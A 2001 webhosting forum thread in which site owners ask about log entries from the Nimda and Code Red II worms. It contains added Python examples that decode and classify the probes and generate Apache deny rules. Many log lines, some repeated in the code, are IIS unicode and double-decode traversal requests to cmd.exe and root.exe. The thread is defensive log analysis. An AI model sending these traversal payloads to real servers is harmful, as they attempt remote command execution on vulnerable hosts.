horoscopes2000
09-18-2001, 09:27 AM
I noticed in my stats somebody attempted to access this file, which does not exist. Is this something sinister?
http://www.mydomainnameremoved.com/scripts/..%c0%af../winnt/system32/cmd.exe
RutRow
09-18-2001, 09:33 AM
It is a Windows shell..... yes, sinister.
If I remember correctly, Code Red infected machines are vulnerable to this exploit.
horoscopes2000
09-18-2001, 09:41 AM
Ah, I think I am probably relatively safe then, as I am not running a Microsoft server.
I traced the IP address and reported it to wanadoo.fr
Can't imagine they can trace a person merely from a log entry though, as all it has is their IP addy and what they tried to do, along with mundane browser info.
Thanks for the reply.
horoscopes2000
09-18-2001, 09:56 AM
Oh, I meant to ask, is this more likely to be an individual specifically targeting my site, or some web-bot who just managed to stumble across it?
acetate
09-18-2001, 10:47 AM
hmm. I got it too? Maybe a new kind of code red worm??
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
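The sixteen requests acetate pasted are the probe set the Nimda worm sent (it was first seen on 18 September 2001, the day of this thread), and every one of them is aimed at two old IIS decoding bugs: the "unicode" traversal (MS00-078), where IIS accepted overlong or malformed two-byte UTF-8 such as %c0%af as '/' and %c1%9c as '\', and the "double decode" bug (MS01-026), where %255c was decoded once to %5c and then again to '\'. The root.exe and /c/, /d/ requests instead look for the cmd.exe copy and drive virtual roots that Code Red II left behind on machines it infected, which is what acetate means by "CR2 opened up a cmd.exe hole". The following is an added example, not code from this thread, that decodes a path the way unpatched IIS did and classifies each hit; the sample log lines are constructed in the shape of the ones above (one harmless request added), and the classification labels are the example's own.

```python
"""Decode and classify IIS traversal probes in Apache access-log lines.

Added example; not code from this thread. It reproduces, on purpose, the
two IIS decoding bugs these requests were written for, so a non-IIS
server's logs can be read the way the intended target would have read them.
"""
import re
from collections import Counter
from typing import List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Constructed sample in the shape of the lines posted above; one benign hit added.
SAMPLE_LOG = """\
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [18/Sep/2001:10:41:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [18/Sep/2001:10:42:03 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
10.0.0.5 - - [18/Sep/2001:10:43:00 -0400] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

# Apache common/combined log: client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_like_iis(path: str) -> str:
    """Decode a request path the way unpatched IIS 4/5 did.

    Two bugs are reproduced deliberately:
    * percent-escapes are decoded twice, so %255c -> %5c -> '\\'
      and %%35%63 -> %5c -> '\\' (the MS01-026 double-decode bug);
    * 0xC0/0xC1 lead bytes are taken as two-byte UTF-8 without checking
      that the sequence is well formed, so %c0%af -> '/', %c1%9c -> '\\'
      and even %c1%1c -> '\\' (the MS00-078 "unicode" bug).
    """
    raw = unquote_to_bytes(unquote_to_bytes(path))
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            # IIS did not verify that raw[i+1] is a valid continuation byte.
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    # Windows treats '\' and '/' alike; normalise so '..' handling sees both.
    return "".join(out).replace("\\", "/")


def escapes_webroot(decoded_path: str) -> bool:
    """True if '..' segments climb above the web root after decoding."""
    depth = 0
    for seg in decoded_path.split("?", 1)[0].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(decoded_path: str) -> Optional[str]:
    """Label a decoded path, or return None if it is not one of these probes."""
    p = decoded_path.split("?", 1)[0].lower()
    if p.endswith("/root.exe"):
        return "root.exe backdoor probe"      # cmd.exe copy left by Code Red II
    if p.startswith(("/c/", "/d/")) and p.endswith("cmd.exe"):
        return "drive vroot probe"            # /c and /d virtual roots left by Code Red II
    if escapes_webroot(p) and p.endswith("cmd.exe"):
        return "directory traversal to cmd.exe"
    return None


def scan(log_text: str) -> Tuple[Counter, List[Tuple[str, str, str]]]:
    """Return (probe count per client IP, list of (ip, label, decoded path))."""
    per_ip: Counter = Counter()
    hits: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, _status = m.groups()
        decoded = decode_like_iis(path)
        label = classify(decoded)
        if label:
            hits.append((ip, label, decoded))
            per_ip[ip] += 1
    return per_ip, hits


if __name__ == "__main__":
    counts, found = scan(SAMPLE_LOG)
    for ip, label, decoded in found:
        print(f"{ip:16} {label:34} {decoded}")
    print(dict(counts))
```

Note that Apache answered the %%35%63 variants with 400 rather than 404: Apache rejects a bare '%' that is not followed by two hex digits, whereas IIS decoded it, which is exactly the difference the worm was counting on. The decoder above follows IIS, not Apache, so those lines still classify as traversal attempts.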
horoscopes2000
09-18-2001, 12:05 PM
Hi acetate,
From what I gather it's something which exploits a security loophole on Microsoft servers. There is a patch available.
If you do a search for "logs cmd.exe" on dejanews there's quite a lot of info about it.
acetate
09-18-2001, 12:30 PM
Thanks for the info.. Luckily I'm not running a windoze server but it's annoying to see my logs filled up every 10 seconds with this windoze exploit.
I believe this is a new MS worm out in the wild, based of course on the same exploits. It looks like it is looking specifically for already infected machines (CR2 opened up a cmd.exe hole).
slade
09-18-2001, 02:27 PM
Dang, looks like I missed being first :bawling:
Oh well, chalk up a few more web servers to un-protected web "transactions"
http://www.webhostingtalk.com/showthread.php?s=&threadid=21413
Can the users connecting to a linux box slow down the http?
I've seen some people saying that these visits increase the system load with http PIDs.
horoscopes2000
09-19-2001, 05:49 AM
I certainly noticed mine was slower, but I don't know if that's why
eva2000
09-19-2001, 05:56 AM
code red 2 ?
http://www.symantec.com/avcenter/venc/data/codered.ii.html
http://www.sitepointforums.com/showthread.php?s=&postid=247906&t=8493#post247906
eva2000
09-19-2001, 05:59 AM
Code red has tried to attack 7830 times. as at 09-19-01 17:57
Code Red II has tried to attack 16794 times. as at 09-19-01 17:57
:rolleyes:
horoscopes2000
10-03-2001, 11:48 AM
I have noticed this is always the same (or very similar IP block) contacting me with this. Is there a way to prevent this IP address contacting my server in the first place?
I am using a RaQ3.
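Since the last question is about keeping a repeat offender off the server, here is an added example (not from this thread, and not Cobalt's own RaQ tooling) that counts cmd.exe/root.exe probes per address block in a constructed log sample and emits Apache `Deny from` lines for any block that crosses a threshold. Grouping by /24 is an assumption taken from the "same or very similar IP block" remark; the threshold of five is arbitrary.

```python
"""Turn repeated cmd.exe/root.exe probes into an address-block deny list.

Added example; not code from this thread or from the RaQ3. The /24 grouping
and the threshold are assumptions chosen for illustration.
"""
import ipaddress
import re
from collections import Counter
from typing import Dict, List

# Constructed sample: two scanners in one /24, one elsewhere, one real visitor.
SAMPLE_LOG = """\
216.74.69.140 - - [03/Oct/2001:11:40:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [03/Oct/2001:11:40:01 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [03/Oct/2001:11:40:01 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.140 - - [03/Oct/2001:11:40:01 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.77 - - [03/Oct/2001:11:41:09 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.74.69.77 - - [03/Oct/2001:11:41:09 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [03/Oct/2001:11:42:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
216.205.119.170 - - [03/Oct/2001:11:42:30 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
10.0.0.5 - - [03/Oct/2001:11:43:00 -0400] "GET /index.html HTTP/1.0" 200 512 "-" "Mozilla/4.0"
"""

# client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
# Anchored on the final path component so /cmd.exe.html or similar is not matched.
PROBE_RE = re.compile(r'/(?:cmd|root)\.exe(?:\?|$)', re.IGNORECASE)


def probes_per_block(log_text: str, prefix_len: int = 24) -> Dict[str, int]:
    """Count probe requests per /prefix_len block, keyed by CIDR string."""
    counts: Counter = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not PROBE_RE.search(m.group(2)):
            continue
        try:
            block = ipaddress.ip_network(f"{m.group(1)}/{prefix_len}", strict=False)
        except ValueError:
            # HostnameLookups On would put a name here instead of an address; skip it.
            continue
        counts[str(block)] += 1
    return dict(counts)


def blocks_to_deny(log_text: str, prefix_len: int = 24, threshold: int = 5) -> List[str]:
    """CIDR blocks whose probe count reaches the threshold, sorted for stable output."""
    counts = probes_per_block(log_text, prefix_len)
    return sorted(b for b, n in counts.items() if n >= threshold)


def deny_directives(blocks: List[str]) -> List[str]:
    """mod_access lines (Apache 1.3/2.x) for httpd.conf or a <Directory> section."""
    return ["Order allow,deny", "Allow from all"] + [f"Deny from {b}" for b in blocks]


if __name__ == "__main__":
    for line in deny_directives(blocks_to_deny(SAMPLE_LOG)):
        print(line)
```

Two caveats before using the output. A /24 deny will also refuse whoever else shares that block with the infected machine, and worm traffic from dial-up or ADSL ranges such as the wanadoo.fr address mentioned earlier moves between addresses, so a list like this needs an expiry rather than living in httpd.conf forever. And an Apache `Deny from` still accepts the TCP connection and sends a 403, so if the goal is to stop the connection being made at all, the same CIDR list has to go into the kernel packet filter; the thread does not say which filter the RaQ3's kernel ships, so that step is left to the reader. As the earlier posters note, a non-IIS server is not at risk from these requests either way; the reason to block is log noise and load, not compromise.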